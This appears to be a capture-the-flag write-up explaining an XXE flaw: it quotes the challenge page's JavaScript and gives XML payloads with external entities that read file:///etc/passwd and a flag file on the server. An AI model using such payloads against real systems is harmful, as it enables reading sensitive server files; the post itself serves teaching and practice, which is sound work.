XXE vulnerability triggered by XML referencing external entities

Record a question first


The input in the input box is displayed in the area above. Check the background source code, there is such a fragment

function XHR() {
        var xhr;
        try {xhr = new XMLHttpRequest();}
        catch(e) {
            var IEXHRVers =["Msxml3.XMLHTTP","Msxml2.XMLHTTP","Microsoft.XMLHTTP"];
            for (var i=0,len=IEXHRVers.length;i< len;i++) {
                try {xhr = new ActiveXObject(IEXHRVers[i]);}
                catch(e) {continue;}
        return xhr;

function send(){
 evil_input = document.getElementById("evil-input").value;
 var xhr = XHR();
     xhr.onreadystatechange = function () {
         if (xhr.readyState==4 && xhr.status==201) {
             data = JSON.parse(xhr.responseText);
             tip_area = document.getElementById("tip-area");
             tip_area.value = data.task.search+data.task.value;


Pass in an array in the form of json

After passing in json, only a few specific values are recorded. The XXE vulnerability is used here



XML: extensible Markup LanguageStandard General Markup Language A subset of is used to mark electronic documents to make them structural Markup Language.

<?xml  version="1.0" ?>

Some XML documents contain "entities" defined by system identifiers, which are rendered in DOCTYPE header tags. These defined 'entities' can access local or remote content. For example, the following XML document sample contains XML 'entities'.


<?xml version="1.0" encoding="utf-8" ?>
<!ENTITY entityex SYSTEM "file:///etc/passwd">


The entityex here refers to the external entity we refer to and the SYSTEM in the content. When the server parses the xml, it will trigger SYSTME to execute file:///etc/passwd


An example of this problem was found:


Click forget pwd below to grab the package.


View return package


Refer to the xml entity, and construct the following statement.


The statement was successfully parsed.


In this problem, we first need to change the content type to application/xml so that we can recognize the xml structure.

According to the above characteristics

<?xml version="1.0" ?>
<!DOCTYPE hsy[
<!ENTITY any SYSTEM "file:///home/ctf/flag.txt">]>





Get flag

Tags: PHP xml JSON Fragment encoding

Posted on Mon, 04 Nov 2019 12:19:16 -0500 by jwadenpfuhl